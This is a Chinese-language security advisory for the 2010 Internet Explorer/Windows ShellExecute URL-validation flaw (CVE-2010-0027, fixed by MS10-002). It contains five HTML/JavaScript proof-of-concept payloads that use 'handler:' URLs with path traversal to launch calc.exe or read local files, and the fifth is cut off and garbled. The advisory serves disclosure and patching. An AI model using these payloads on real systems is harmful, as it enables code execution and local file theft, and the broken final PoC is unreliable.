受影响系统:
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000SP4
描述:
BUGTRAQ ID: 37884
CVE ID: CVE-2010-0027
Microsoft Windows是微软发布的非常流行的操作系统。
IE浏览器等应用使用ShellExecute API函数处理文件。由于没有正确的对数据流执行验证,用户受骗跟随了恶意URL就可能导致绕过安全过滤执行本地系统上的二进制程序。
<*来源:Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM)
链接:http://secunia.com/advisories/38501/
http://marc.info/?l=full-disclosure&m=126574567400473&w=2
http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA10-040A.html
http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>
############# EOF #################
############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############### EOF ###########
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert(‘content: ‘ + content);
content = ‘change iframe content’;
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe(‘myIframe’)">Get the content</a>
</body>
</html>
##################### EOF #############################
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28’shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?
建议:
厂商补丁:
Microsoft
———
Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
0 条评论。